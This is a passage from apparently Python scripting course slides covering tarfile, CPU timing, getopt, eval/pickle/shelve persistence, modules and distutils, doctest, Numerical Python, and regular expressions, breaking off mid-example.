    >>> for file in files:
    ...     if not file in allfiles:  print 'missing', file
    ...
    >>> hw = tar.extractfile('hw.py')  # extract as file object
    >>> hw.readlines()
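    
    Writing and reading can be combined in one self-contained round trip. This sketch creates two small sample files in a temporary directory (file names and contents are invented), packs them, and reads the archive back without unpacking it to disk:

```python
import os
import tarfile
import tempfile

workdir = tempfile.mkdtemp()
# two small sample files, invented for the illustration
names = ['hw.py', 'data.txt']
for name in names:
    with open(os.path.join(workdir, name), 'w') as f:
        f.write('sample text in %s\n' % name)

# pack the files; arcname stores them without the directory part
archive = os.path.join(workdir, 'tmp.tar.gz')
tar = tarfile.open(archive, 'w:gz')
for name in names:
    tar.add(os.path.join(workdir, name), arcname=name)
tar.close()

# read the archive back; mode 'r' detects the compression itself
tar = tarfile.open(archive, 'r')
members = tar.getnames()
first_line = tar.extractfile('hw.py').readline()
tar.close()
```

    In Python 3 the file object returned by extractfile delivers bytes, not text.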
    



    Measuring CPU time (1)

    The time module:
    import time
    e0 = time.time()     # elapsed time since the epoch
    c0 = time.clock()    # total CPU time spent so far
    # do tasks...
    elapsed_time = time.time() - e0
    cpu_time = time.clock() - c0
    
    The os.times function returns a tuple:
    os.times()[0]  : user   time, current process
    os.times()[1]  : system time, current process
    os.times()[2]  : user   time, child processes
    os.times()[3]  : system time, child processes
    os.times()[4]  : elapsed time
    
    CPU time = user time + system time



    Measuring CPU time (2)

    Application:
    t0 = os.times()
    # do tasks...
    os.system(time_consuming_command) # child process
    t1 = os.times()
    
    elapsed_time = t1[4] - t0[4]
    user_time    = t1[0] - t0[0]
    system_time  = t1[1] - t0[1]
    cpu_time     = user_time + system_time
    cpu_time_system_call = t1[2]-t0[2] + t1[3]-t0[3]
    
    There is a special Python profiler for finding bottlenecks in scripts (ranks functions according to their CPU-time consumption)



    A timer function

    Let us make a function timer for measuring the efficiency of an arbitrary function. timer takes 4 arguments:

    a function to call
    a list of arguments to the function
    number of calls to make (repetitions)
    name of function (for printout)
    def timer(func, args, repetitions, func_name):
        t0 = time.time();  c0 = time.clock()
    
        for i in range(repetitions):
            func(*args)  # old style: apply(func, args)
    
        print '%s: elapsed=%g, CPU=%g' % \
        (func_name, time.time()-t0, time.clock()-c0)
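    
    time.clock is no longer available in recent Python 3 versions. A sketch of the same timer for Python 3.3 or later, assuming time.process_time as the replacement for the CPU time measurement, and returning the two numbers in addition to printing them:

```python
import time

def timer(func, args, repetitions, func_name):
    """Call func(*args) repetitions times; return (elapsed, cpu) in seconds."""
    t0 = time.time()
    c0 = time.process_time()    # CPU time of this process (Python 3.3+)
    for i in range(repetitions):
        func(*args)
    elapsed = time.time() - t0
    cpu = time.process_time() - c0
    print('%s: elapsed=%g, CPU=%g' % (func_name, elapsed, cpu))
    return elapsed, cpu

# time 1000 calls of the built-in pow(2.0, 0.5)
elapsed, cpu = timer(pow, (2.0, 0.5), 1000, 'pow')
```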
    



    Parsing command-line arguments

    Running through sys.argv[1:] and extracting command-line info 'manually' is easy
    Using standardized modules and interface specifications is better!
    Python's getopt and optparse modules parse the command line
    getopt is the simplest to use
    optparse is the most sophisticated



    Short and long options

    It is a 'standard' to use either short or long options
    -d dirname           # short options -d and -h
    --directory dirname  # long options --directory and --help
    
    Short options have single hyphen,
    long options have double hyphen
    Options can take a value or not:
    --directory dirname --help --confirm
    -d dirname -h -i
    
    Short options can be combined
    -iddirname   is the same as  -i -d dirname
    



    Using the getopt module (1)

    Specify short options by the option letters, followed by colon if the option requires a value
    Example: 'id:h'
    Specify long options by a list of option names, where names must end with = if they require a value
    Example: ['help','directory=','confirm']



    Using the getopt module (2)

    getopt returns a list of (option,value) pairs and a list of the remaining arguments
    Example:
    --directory mydir -i file1 file2
    
    makes getopt return
    [('--directory','mydir'), ('-i','')]
    ['file1','file2']
    



    Using the getopt module (3)

    Processing:
    import getopt, sys
    try:
        options, args = getopt.getopt(sys.argv[1:], 'd:hi',
                        ['directory=', 'help', 'confirm'])
    except getopt.GetoptError:
        # wrong syntax on the command line, illegal options,
        # missing values etc.
        sys.exit(1)
    
    directory = None; confirm = 0  # default values
    for option, value in options:
        if option in ('-h', '--help'):
            pass  # print usage message
        elif option in ('-d', '--directory'):
            directory = value
        elif option in ('-i', '--confirm'):
            confirm = 1
    



    Using the interface

    Equivalent command-line arguments:
    -d mydir --confirm src1.c src2.c
    --directory mydir -i src1.c src2.c
    --directory=mydir --confirm src1.c src2.c
    
    Abbreviations of long options are possible, e.g.,
    --d mydir --co
    
    This one also works: -idmydir
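    
    That these command lines are equivalent can be checked by running getopt on explicit argument lists instead of sys.argv[1:]. A minimal sketch, where parse is a hypothetical helper that wraps the processing loop from the previous slide:

```python
import getopt

def parse(argv):
    """Return (directory, confirm, remaining_args) for a list like sys.argv[1:]."""
    options, args = getopt.getopt(argv, 'd:hi',
                                  ['directory=', 'help', 'confirm'])
    directory = None; confirm = 0   # default values
    for option, value in options:
        if option in ('-d', '--directory'):
            directory = value
        elif option in ('-i', '--confirm'):
            confirm = 1
    return directory, confirm, args

r1 = parse(['-d', 'mydir', '--confirm', 'src1.c', 'src2.c'])
r2 = parse(['--directory=mydir', '-i', 'src1.c', 'src2.c'])
r3 = parse(['-idmydir', 'src1.c', 'src2.c'])
r4 = parse(['--d', 'mydir', '--co'])    # abbreviated long options
```

    Illegal options make getopt.getopt raise getopt.GetoptError.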



    Writing Python data structures

    Write nested lists:
    somelist = ['text1', 'text2']
    a = [[1.3,somelist], 'some text']
    f = open('tmp.dat', 'w')
    
    # convert data structure to its string repr.:
    f.write(str(a))  
    f.close()
    
    Equivalent statements writing to standard output:
    print a
    sys.stdout.write(str(a) + '\n')
    
    # sys.stdin        standard input as file object
    # sys.stdout       standard output as file object
    



    Reading Python data structures

    eval(s): treat string s as Python code
    a = eval(str(a)) is a valid 'equation' for basic Python data structures
    Example: read nested lists
    f = open('tmp.dat', 'r')  # file written in last slide
    # evaluate first line in file as Python code:
    newa = eval(f.readline())
    
    results in
    [[1.3, ['text1', 'text2']], 'some text']
    
    # i.e.
    newa = eval(f.readline())
    # is the same as
    newa = [[1.3, ['text1', 'text2']], 'some text']
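    
    eval executes any Python code found in the string, which is risky if the file comes from an untrusted source. For plain data structures, ast.literal_eval (Python 2.6 and later) is a more restrictive alternative. A sketch of the same round trip, with the string kept in memory instead of in a file:

```python
import ast

a = [[1.3, ['text1', 'text2']], 'some text']
s = repr(a)                  # string representation, as written to file

newa = ast.literal_eval(s)   # accepts literals only, not arbitrary code
```

    A string containing a function call, for instance, makes ast.literal_eval raise ValueError instead of running the call.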
    



    Remark about str and eval

    str(a) is implemented as an object function
    __str__
    
    repr(a) is implemented as an object function
    __repr__
    
    str(a): pretty print of an object
    repr(a): print of all info for use with eval
    a = eval(repr(a))
    str and repr give identical results for many standard Python objects (lists, dictionaries, integers), but not for strings, where repr includes the quotes



    Persistence

    Many programs need to have persistent data structures, i.e., data live after the program is terminated and can be retrieved the next time the program is executed
    str, repr and eval are convenient for making data structures persistent
    pickle, cPickle and shelve are other (more sophisticated) Python modules for storing/loading objects



    Pickling

    Write any set of data structures to file using the cPickle module:
    f = open(filename, 'w')
    import cPickle
    cPickle.dump(a1, f)
    cPickle.dump(a2, f)
    cPickle.dump(a3, f)
    f.close()
    
    Read data structures in again later:
    f = open(filename, 'r')
    a1 = cPickle.load(f)
    a2 = cPickle.load(f)
    a3 = cPickle.load(f)
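    
    A self-contained round trip, written as a sketch for Python 3, where the module is named pickle and the file must be opened in binary mode ('wb'/'rb'). The data structures and the file name tmp.pkl are made up:

```python
import os
import pickle      # cPickle in Python 2 offers the same dump/load functions
import tempfile

a1 = [1.3, ['text1', 'text2']]   # made-up sample data
a2 = {'mass': 2.5}

filename = os.path.join(tempfile.mkdtemp(), 'tmp.pkl')

f = open(filename, 'wb')     # binary mode
pickle.dump(a1, f)
pickle.dump(a2, f)
f.close()

f = open(filename, 'rb')
b1 = pickle.load(f)          # objects come back in the order they were dumped
b2 = pickle.load(f)
f.close()
```

    As with eval, only unpickle files from sources you trust.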
    



    Shelving

    Think of shelves as dictionaries with file storage
    import shelve
    database = shelve.open(filename)
    database['a1'] = a1  # store a1 under the key 'a1'
    database['a2'] = a2
    database['a3'] = a3
    # or
    database['a123'] = (a1, a2, a3)
    
    # retrieve data:
    if 'a1' in database:
        a1 = database['a1']
    # and so on
    
    # delete an entry:
    del database['a2']
    
    database.close()
    



    What assignment really means

    >>> a = 3           # a refers to int object with value 3
    >>> b = a           # b refers to a (int object with value 3)
    >>> id(a), id(b)    # print integer identifications of a and b
    (135531064, 135531064)
    >>> id(a) == id(b)  # same identification?
    True                # a and b refer to the same object
    >>> a is b          # alternative test
    True
    >>> a = 4           # a refers to a (new) int object
    >>> id(a), id(b)    # let's check the IDs
    (135532056, 135531064)
    >>> a is b
    False
    >>> b     # b still refers to the int object with value 3
    3
    



    Assignment vs in-place changes

    >>> a = [2, 6]     # a refers to a list [2, 6]
    >>> b = a          # b refers to the same list as a
    >>> a is b
    True
    >>> a = [1, 6, 3]  # a refers to a new list
    >>> a is b
    False
    >>> b              # b still refers to the old list
    [2, 6]
    
    >>> a = [2, 6]
    >>> b = a
    >>> a[0] = 1       # make in-place changes in a 
    >>> a.append(3)    # another in-place change
    >>> a
    [1, 6, 3]
    >>> b
    [1, 6, 3]
    >>> a is b         # a and b refer to the same list object
    True
    



    Assignment with copy

    What if we want b to be a copy of a?
    Lists: a[:] extracts a slice, which is a copy of all elements:
    >>> b = a[:]   # b refers to a copy of elements in a
    >>> b is a
    False
    
    In-place changes in a will not affect b
    Dictionaries: use the copy method:
    >>> a = {'refine': False}
    >>> b = a.copy()
    >>> b is a
    False
    
    In-place changes in a will not affect b
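    
    Both a[:] and the dictionary copy method make shallow copies: the container is new, but the items are still shared. With nested data structures, in-place changes in an item are therefore visible through the copy. A small sketch, using copy.deepcopy from the standard copy module for a fully independent copy:

```python
import copy

a = [1, [2, 3]]
b = a[:]                # shallow copy: new outer list, same inner list
c = copy.deepcopy(a)    # deep copy: inner list is copied too

a[0] = 100              # not seen through b or c
a[1].append(4)          # seen through b, since b[1] is a[1]
```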



    Third-party Python modules

    Parnassus is a large collection of Python modules, see link from www.python.org
    Do not reinvent the wheel, search Parnassus!





    Python modules




    Contents

    Making a module
    Making Python aware of modules
    Packages
    Distributing and installing modules



    More info

    Appendix B.1 in the course book
    Python electronic documentation:
    Distributing Python Modules, Installing Python Modules



    Make your own Python modules!

    Reuse scripts by wrapping them in classes or functions
    Collect classes and functions in library modules
    How? just put classes and functions in a file MyMod.py
    Put MyMod.py in one of the directories where Python can find it (see next slide)
    Say
    import MyMod
    # or
    import MyMod as M   # M is a short form
    # or
    from MyMod import *
    # or
    from MyMod import myspecialfunction, myotherspecialfunction
    
    in any script



    How Python can find your modules

    Python has some 'official' module directories, typically
    /usr/lib/python2.3
    /usr/lib/python2.3/site-packages
    
    + current working directory
    The environment variable PYTHONPATH may contain additional directories with modules
    unix> echo $PYTHONPATH
    /home/me/python/mymodules:/usr/lib/python2.2:/home/you/yourlibs
    
    Python's sys.path list contains the directories where Python searches for modules
    (sys.path contains 'official' directories, plus those in PYTHONPATH)



    Setting PYTHONPATH

    In a Unix Bash environment, environment variables are normally set in .bashrc:
    export PYTHONPATH=$HOME/pylib:$scripting/src/tools
    
    Check the contents:
    unix> echo $PYTHONPATH
    
    In a Windows environment one can do the same in autoexec.bat:
    set PYTHONPATH=C:\pylib;%scripting%\src\tools
    
    Check the contents:
    dos> echo %PYTHONPATH%
    
    Note: it is easy to make mistakes; PYTHONPATH may be different from what you think, so check sys.path



    Summary of finding modules

    Copy your module file(s) to a directory already contained in sys.path
    unix or dos> python -c 'import sys; print sys.path' 
    
    Can extend PYTHONPATH
    # Bash syntax:
    export PYTHONPATH=$PYTHONPATH:/home/me/python/mymodules
    
    Can extend sys.path in the script:
    sys.path.insert(0, '/home/me/python/mynewmodules')
    
    (insert first in the list)



    Packages (1)

    A set of related modules can be collected in a package
    Normally, a package is organized as module files in a directory tree
    Each subdirectory has a file __init__.py
    (can be empty)
    Packages allow ``dotted module names'' like
    MyMod.numerics.pde.grids
    
    reflecting a file MyMod/numerics/pde/grids.py



    Packages (2)

    Can import modules in the tree like this:
    from MyMod.numerics.pde.grids import fdm_grids
    
    grid = fdm_grids()
    grid.domain(xmin=0, xmax=1, ymin=0, ymax=1)
    ...
    
    Here, class fdm_grids is in module grids (file grids.py) in the directory MyMod/numerics/pde
    Or
    import MyMod.numerics.pde.grids
    grid = MyMod.numerics.pde.grids.fdm_grids()
    grid.domain(xmin=0, xmax=1, ymin=0, ymax=1)
    #or
    import MyMod.numerics.pde.grids as Grid
    grid = Grid.fdm_grids()
    grid.domain(xmin=0, xmax=1, ymin=0, ymax=1)
    
    See ch. 6 of the Python Tutorial (part of the electronic doc)
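    The directory layout can be tried out with a small sketch that builds a package tree in a temporary directory and imports from it. The package name demo_pkg and the body of the stand-in class fdm_grids are assumptions made for the illustration; only the layout (one __init__.py per directory level, module file at the bottom) follows the slides.

```python
import os
import sys
import tempfile

root = tempfile.mkdtemp()   # stands in for a directory listed in sys.path
pkg_dir = os.path.join(root, 'demo_pkg', 'numerics', 'pde')
os.makedirs(pkg_dir)

# Each directory level of the package gets an (empty) __init__.py file.
for subdir in ('demo_pkg',
               os.path.join('demo_pkg', 'numerics'),
               os.path.join('demo_pkg', 'numerics', 'pde')):
    open(os.path.join(root, subdir, '__init__.py'), 'w').close()

# The module grids.py with a small stand-in class.
with open(os.path.join(pkg_dir, 'grids.py'), 'w') as f:
    f.write(
        "class fdm_grids:\n"
        "    def domain(self, xmin=0, xmax=1):\n"
        "        self.limits = (xmin, xmax)\n"
    )

sys.path.insert(0, root)

from demo_pkg.numerics.pde.grids import fdm_grids
grid = fdm_grids()
grid.domain(xmin=0, xmax=2)
print(grid.limits)

# The "import ... as" form gives access to the same class object.
import demo_pkg.numerics.pde.grids as Grid
same_class = Grid.fdm_grids is fdm_grids
```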



    Test/doc part of a module

    Module files can have a test/demo script at the end:
    if __name__ == '__main__':
        infile = sys.argv[1]; outfile = sys.argv[2]
        for i in sys.argv[3:]:
            create(infile, outfile, i)
    
    The block is executed if the module file is run as a script
    The tests at the end of a module often serve as good examples on the usage of the module



    Public/non-public module variables

    Python convention: add a leading underscore to non-public functions and (module) variables
    _counter = 0
    
    def _filename():
        """Generate a random filename."""
        ...
    
    After a standard import, import MyMod, we may access
    MyMod._counter
    n = MyMod._filename()
    
    but after a from MyMod import * the names with leading underscore are not available
    Use the underscore to tell users what is public and what is not
    Note: non-public parts can be changed in future releases
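    The difference between the two import forms can be checked with a short sketch. The module demo_public_mod and its contents are invented for the illustration; the star import is executed in a fresh dictionary so that the imported names can be listed.

```python
import os
import sys
import tempfile

module_dir = tempfile.mkdtemp()
with open(os.path.join(module_dir, 'demo_public_mod.py'), 'w') as f:
    f.write(
        "_counter = 0\n"
        "def _filename():\n"
        "    return 'tmp.dat'\n"
        "def create():\n"
        "    return 'created'\n"
    )
sys.path.insert(0, module_dir)

# Standard import: non-public names are reachable through the module prefix.
import demo_public_mod
via_prefix = (demo_public_mod._counter, demo_public_mod._filename())

# Star import into a fresh namespace: names with a leading underscore are skipped.
namespace = {}
exec('from demo_public_mod import *', namespace)
imported = sorted(name for name in namespace if not name.startswith('__'))
print(imported)
```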



    Installation of modules/packages

    Python has its own build/installation system: Distutils
    Build: compile (Fortran, C, C++) into module
    (only needed when modules employ compiled code)
    Installation: copy module files to ``install'' directories
    Publish: make module available for others through PyPI
    Default installation directory:
    os.path.join(sys.prefix, 'lib', 'python' + sys.version[0:3],
                 'site-packages')
    # e.g. /usr/lib/python2.3/site-packages
    
    Distutils relies on a setup.py script



    A simple setup.py script

    Say we want to distribute two modules in two files
    MyMod.py  mymodcore.py
    
    Typical setup.py script for this case:
    #!/usr/bin/env python
    from distutils.core import setup
    
    setup(name='MyMod',
          version='1.0',
          description='Python module example',
          author='Hans Petter Langtangen',
          author_email='hpl@ifi.uio.no',
          url='http://www.simula.no/pymod/MyMod',
          py_modules=['MyMod', 'mymodcore'],
         )
    



    setup.py with compiled code

    Modules can also make use of Fortran, C, C++ code
    setup.py can also list C and C++ files; these will be compiled with the same options/compiler as used for Python itself
    SciPy has an extension of Distutils for ``intelligent'' compilation of Fortran files
    Note: setup.py eliminates the need for makefiles
    Examples of such setup.py files are provided in the section on mixing Python with Fortran, C and C++



    Installing modules

    Standard command:
    python setup.py install
    
    If the module contains files to be compiled, a two-step procedure can be invoked
    python setup.py build
    # compiled files and modules are made in subdir. build/
    python setup.py install
    



    Controlling the installation destination

    setup.py has many options
    Control the destination directory for installation:
    python setup.py install --home=$HOME/install
    # copies modules to /home/hpl/install/lib/python
    
    Make sure that /home/hpl/install/lib/python is registered in your PYTHONPATH



    How to learn more about Distutils

    Go to the official electronic Python documentation
    Look up ``Distributing Python Modules''
    (for packing modules in setup.py scripts)
    Look up ``Installing Python Modules''
    (for running setup.py with various options)





    Doc strings




    Contents

  • How to document usage of Python functions, classes, modules

  • Automatic testing of code (through doc strings)



    More info

    App. B.1/B.2 in the course book
    HappyDoc, Pydoc, Epydoc manuals
    Style guide for doc strings (see doc.html)



    Doc strings (1)

    Doc strings = first string in functions, classes, files
    Put user information in doc strings:
    def ignorecase_sort(a, b):
        """Compare strings a and b, ignoring case."""
        ...
    
    The doc string is available at run time and explains the purpose and usage of the function:
    >>> print ignorecase_sort.__doc__
    Compare strings a and b, ignoring case.
    



    Doc strings (2)

    Doc string in a class:
    class MyClass:
        """Fake class just for exemplifying doc strings."""
        
        def __init__(self):
           ...
    
    The doc string of a module is an (often multi-line) string at the top of the file
    """
    This module is a fake module
    for exemplifying multi-line
    doc strings.
    """
    



    Doc strings (3)

    The doc string serves three purposes:

    documentation in the source code
    on-line documentation through the attribute
    __doc__
    
    documentation generated by, e.g., HappyDoc
    HappyDoc: Tool that can extract doc strings and automatically produce overview of Python classes, functions etc.
    Doc strings can, e.g., be used as balloon help in sophisticated GUIs (cf. IDLE)
    Providing doc strings is a good habit!



    Doc strings (4)

    There is an official style guide for doc strings:

    PEP 257 "Docstring Conventions" from http://www.python.org/dev/peps/
    Use triple double quoted strings as doc strings
    Use complete sentences, ending in a period
    def somefunc(a, b):
        """Compare a and b."""
    



    Automatic doc string testing (1)

    The doctest module enables automatic testing of interactive Python sessions embedded in doc strings
    class StringFunction:
        """
        Make a string expression behave as a Python function
        of one variable.
        Examples on usage:
        >>> from StringFunction import StringFunction
        >>> f = StringFunction('sin(3*x) + log(1+x)')
        >>> p = 2.0; v = f(p)  # evaluate function
        >>> p, v
        (2.0, 0.81919679046918392)
        >>> f = StringFunction('1+t', independent_variables='t')
        >>> v = f(1.2)  # evaluate function of t=1.2
        >>> print "%.2f" % v
        2.20
        >>> f = StringFunction('sin(t)')
        >>> v = f(1.2)  # evaluate function of t=1.2
        Traceback (most recent call last):
            v = f(1.2)
        NameError: name 't' is not defined
        """
    



    Automatic doc string testing (2)

    Class StringFunction is contained in the module StringFunction
    Let StringFunction.py execute two statements when run as a script:
    def _test():
        import doctest, StringFunction
        return doctest.testmod(StringFunction)
    
    if __name__ == '__main__':
        _test()
    
    Run the test:
    python StringFunction.py       # no output: all tests passed
    python StringFunction.py  -v   # verbose output
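    A self-contained sketch of the same idea, without a separate module file: the function average and the helper run_doctests are invented for this illustration, and the doctest finder/runner classes are used directly instead of doctest.testmod so that the number of tests and failures can be inspected.

```python
import doctest

def average(values):
    """
    Return the arithmetic mean of a non-empty sequence.

    >>> average([1, 2, 3])
    2.0
    >>> average([10])
    10.0
    """
    return sum(values) / float(len(values))

def run_doctests(func):
    """Run the interactive sessions in func's doc string."""
    finder = doctest.DocTestFinder()
    runner = doctest.DocTestRunner(verbose=False)
    # module=False: do not try to locate the defining module;
    # globs supplies the names the doc string examples need.
    for test in finder.find(func, name=func.__name__, module=False,
                            globs={func.__name__: func}):
        runner.run(test)
    return runner.summarize(verbose=False)

results = run_doctests(average)
print(results.failed)      # number of failing examples
print(results.attempted)   # number of examples that were run
```

    As with doctest.testmod, no failure report is printed when all examples give the documented output.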
    





    Numerical Python




    Contents

    Efficient array computing in Python
    Creating arrays
    Indexing/slicing arrays
    Random numbers
    Linear algebra



    More info

    Ch. 4 in the course book
    Numeric, numarray, or numpy manual



    Numerical Python (NumPy)

    NumPy enables efficient numerical computing in Python
    NumPy is a Python/C package which offers efficient arrays (contiguous storage) and mathematical operations in C
    Classic and widely used Numeric module:
    from Numeric import *
    
    Numarray alternative:
    from numarray import *
    
    numpy - a third ``replacement'' implementation:
    from numpy import *
    
    Numerical Python contains other modules as well - these have slightly different names and features in the three implementations :-(



    py4cs.numpytools

    Most probably we will have to live with three implementations
    We have made a small interface layer (module) numpytools and added some extra functions
    from py4cs.numpytools import *
    
    This module provides a unified interface to Numeric, numarray, and numpy, based on the ``least common denominator'' principle (use only functionality that is present in all three packages)



    NumPy: making arrays

    from py4cs.numpytools import *
    # or from Numeric import *  # or from numpy import *
    
    # create an array a of length n, with zeroes and
    # double precision float type:
    a = zeros(n, Float)
    
    # create an array x with values from -5 to 4.5 in steps of 0.5:
    x = arrayrange(-5, 5, 0.5, Float) 
    # better: use sequence from py4cs.numpytools (5 is included):
    x = sequence(-5, 5, 0.5) # -5, -4.5, ..., 5.0
    
    # it is trivial to make accompanying y values:
    y = sin(x/2.0)*3.0
    
    # create a NumPy array from a Python list:
    pl = [0, 1.2, 4, -9.1, 5, 8]
    a = array(pl, typecode=Float)  # (can omit typecode)
    
    a.shape = (2,3) # turn a into a 2x3 matrix
    a.shape = (size(a),)   # back to vector
    



    NumPy: computing with arrays

    b = 3*a - 1
    
    # in-place (memory saving) alternative:
    b = a              # no copy: b and a refer to the same array
    multiply(b, 3, b)  # b = 3*b (a is overwritten too)
    subtract(b, 1, b)  # b = b - 1
    
    # standard mathematical functions:
    c = sin(b)    
    c = arcsin(c) 
    c = sinh(b)
    c = b**2.5  # power function
    c = log(b)
    c = sqrt(b)
    
    # subscripting:
    a[2:4] = -1      # set a[2] and a[3] to -1
    a[-1]  = a[0]    # set last element equal to first one
    a.shape = (3,2)
    print a[:,0]     # print first column
    print a[:,1::2]  # print second column with stride 2
    



    Warning: arange/arrayrange is unreliable (1)

    arange and arrayrange (synonym) are supposed not to include the upper limit (like range and xrange)
    Try out
    nerrors = 0
    for n in range(1, 101):
        x1 = arange(0, 1, 1./n)[-1]  # should be less than 1
        print n, x1
        if x1 == 1.0: nerrors += 1
    print 'leading to', nerrors, 'unexpected cases'
    
    58 (random!) cases out of 100 gave unexpected behavior!



    Warning: arange/arrayrange is unreliable (2)

    Stay away from arange and arrayrange, use seq (or sequence) and iseq (or isequence) from numpytools instead:
    from py4cs.numpytools import *
    x = seq(0, 1, 1./n)
    I = iseq(0, 100, 2)       # includes 100
    
    numpy.linspace is a similar alternative
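    The idea behind an end-point-including sequence can be sketched in pure Python. This is an illustrative stand-in (the name inclusive_seq is invented), not the implementation found in py4cs.numpytools: the number of intervals is computed once by rounding, so the length of the result does not depend on round-off errors in the step.

```python
def inclusive_seq(start, stop, step):
    """Return start, start+step, ..., up to and including stop."""
    # Rounding makes the element count robust against round-off in step.
    n_intervals = int(round((stop - start) / float(step)))
    return [start + i * step for i in range(n_intervals + 1)]

# Same experiment as for arange: the length is always n+1.
lengths_ok = all(len(inclusive_seq(0, 1, 1.0 / n)) == n + 1
                 for n in range(1, 101))
print(lengths_ok)

x = inclusive_seq(-5, 5, 0.5)
print(len(x))
```

    The last element is computed as start + n*step and may therefore differ from stop in the last digit; only the number of elements is guaranteed here.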



    NumPy: random numbers

    Random number generation:
    from Numeric import *
    import RandomArray  # separate module in the Numeric distribution
    
    RandomArray.seed(1928,1277) # set seed
    # seed() provides a seed based on current time
    print 'mean of %d uniform random numbers:' % n
    
    u = RandomArray.random(n)  # uniform numbers on (0,1)
    print 'on (0,1):', sum(u)/n, '(should be 0.5)'
    
    u = RandomArray.uniform(-1,1,n) # uniform numbers on (-1,1)
    print 'on (-1,1):', sum(u)/n, '(should be 0)'
    
    mean = 0.0; stdev = 1.0
    u = RandomArray.normal(mean, stdev, n)
    m = sum(u)/n  # empirical mean
    s = sqrt(sum((u - m)**2)/(n-1))  # empirical st.dev.
    print 'generated %d N(0,1) samples with\nmean %g '\
          'and st.dev. %g using RandomArray.normal' % (n, m, s)
    



    NumPy example

    Continuation of last slide
    Find the probability that normal samples are less than 1.5:
    u = RandomArray.normal(mean, stdev, n)
    
    less_than = u < 1.5
    
    # (less_than[i] is 1 if u[i]<1.5, otherwise 0, i.e.
    #  less_than is an array like (0,0,1,1,0,0,1,0,...0,1,0))
    
    p = sum(less_than)
    prob = p/float(n)
    
    print "probability=%.2f" % prob
    
    Vectorized operations give high efficiency, but require a different way of thinking



    Python + Matlab = true

    A Python module, pymat, enables communication with Matlab:
    from Numeric import *
    import math, pymat
    
    x = arrayrange(0, 4*math.pi, 0.1)
    m = pymat.open()
    # can send NumPy arrays to Matlab:
    pymat.put(m, 'x', x);
    pymat.eval(m, 'y = sin(x)')
    pymat.eval(m, 'plot(x,y)')
    # get a new NumPy array back:
    y = pymat.get(m, 'y')
    





    Regular expressions




    Contents

    Motivation for regular expressions
    Regular expression syntax
    Lots of examples on problem solving with regular expressions
    Many examples related to scientific computations



    More info

    Ch. 8.2 in the course book
    Regular Expression HOWTO for Python (see doc.html)
    perldoc perlrequick (intro), perldoc perlretut (tutorial), perldoc perlre (full reference)
    ``Text Processing in Python'' by Mertz (Python syntax)
    ``Mastering Regular Expressions'' by Friedl (Perl syntax)
    Note: the core syntax is the same in Perl, Python, Ruby, Tcl, Egrep, Vi/Vim, Emacs, ..., so books about these tools also provide info on regular expressions



    Motivation

    Consider a simulation code with this type of output:
    t=2.5  a: 1.0 6.2 -2.2   12 iterations and eps=1.38756E-05
    t=4.25  a: 1.0 1.4   6 iterations and eps=2.22433E-05
    >> switching from method AQ4 to AQP1
    t=5  a: 0.9   2 iterations and eps=3.78796E-05
    t=6.386  a: 1.0 1.1525   6 iterations and eps=2.22433E-06
    >> switching from method AQP1 to AQ2
    t=8.05  a: 1.0   3 iterations and eps=9.11111E-04
    ...
    
    You want to make two graphs:

    iterations vs t
    eps vs t
    How can you extract the relevant numbers from the text?



    Regular expressions

    Some structure in the text, but line.split() is too simple (different number of columns/words in each line)
    Regular expressions constitute a powerful language for formulating structure and extracting parts of a text
    Regular expressions look cryptic for the novice
    regex/regexp: abbreviations for regular expression



    Specifying structure in a text

    t=6.386  a: 1.0 1.1525   6 iterations and eps=2.22433E-06
    

    Structure: t=, number, 2 blanks, a:, some numbers, 3 blanks, integer, ' iterations and eps=', number
    Regular expressions constitute a language for specifying such structures
    Formulation in terms of a regular expression:
    t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
    



    Dissection of the regex

    A regex usually contains special characters introducing freedom in the text:
    t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
    
    t=6.386  a: 1.0 1.1525   6 iterations and eps=2.22433E-06
    
    .          any character
    .*         zero or more . (i.e. any sequence of characters)
    (.*)       can extract the match for .* afterwards
    \s         whitespace (spacebar, newline, tab)
    \s{2}      two whitespace characters
    a:         exact text
    .*         arbitrary text
    \s+        one or more whitespace characters
    \d+        one or more digits (i.e. an integer)
    (\d+)      can extract the integer later
    iterations and eps=     exact text
    



    Using the regex in Python code

    import re
    pattern = \
    r"t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)"
    
    t = []; iterations = []; eps = []
    
    # the output to be processed is stored in the list of lines
    
    for line in lines:
    
        match = re.search(pattern, line)
    
        if match:
            t.append         (float(match.group(1)))
            iterations.append(int  (match.group(2)))
            eps.append       (float(match.group(3)))
    



    Result

    Output text to be interpreted:
    t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05
    t=4.25  a: 1.0 1.4   6 iterations and eps=2.22433E-05
    >> switching from method AQ4 to AQP1
    t=5  a: 0.9   2 iterations and eps=3.78796E-05
    t=6.386  a: 1 1.15   6 iterations and eps=2.22433E-06
    >> switching from method AQP1 to AQ2
    t=8.05  a: 1.0   3 iterations and eps=9.11111E-04
    
    Extracted Python lists:
    t = [2.5, 4.25, 5.0, 6.386, 8.05]
    iterations = [12, 6, 2, 6, 3]
    eps = [1.38756e-05, 2.22433e-05, 3.78796e-05, 
           2.22433e-06, 9.11111E-04]
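    The two slides above can be combined into one runnable sketch. The pattern and the test text are taken from the slides; storing the text in a string named output and splitting it into lines is an assumption about how the simulator output is made available.

```python
import re

output = (
    "t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05\n"
    "t=4.25  a: 1.0 1.4   6 iterations and eps=2.22433E-05\n"
    ">> switching from method AQ4 to AQP1\n"
    "t=5  a: 0.9   2 iterations and eps=3.78796E-05\n"
    "t=6.386  a: 1 1.15   6 iterations and eps=2.22433E-06\n"
    ">> switching from method AQP1 to AQ2\n"
    "t=8.05  a: 1.0   3 iterations and eps=9.11111E-04\n"
)

pattern = r"t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)"

t = []; iterations = []; eps = []
for line in output.splitlines():
    match = re.search(pattern, line)
    if match:  # the ">> switching ..." lines do not match and are skipped
        t.append(float(match.group(1)))
        iterations.append(int(match.group(2)))
        eps.append(float(match.group(3)))

print(t)
print(iterations)
print(eps)
```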
    



    Another regex that works

    Consider the regex
    t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)
    
    compared with the previous regex
    t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
    
    Less structure
    How 'exact' does a regex need to be?
    The degree of preciseness depends on the probability of making a wrong match



    Failure of a regex

    Suppose we change the regular expression to
    t=(.*)\s+a:.*(\d+).*=(.*)
    
    It works on most lines in our test text but not on
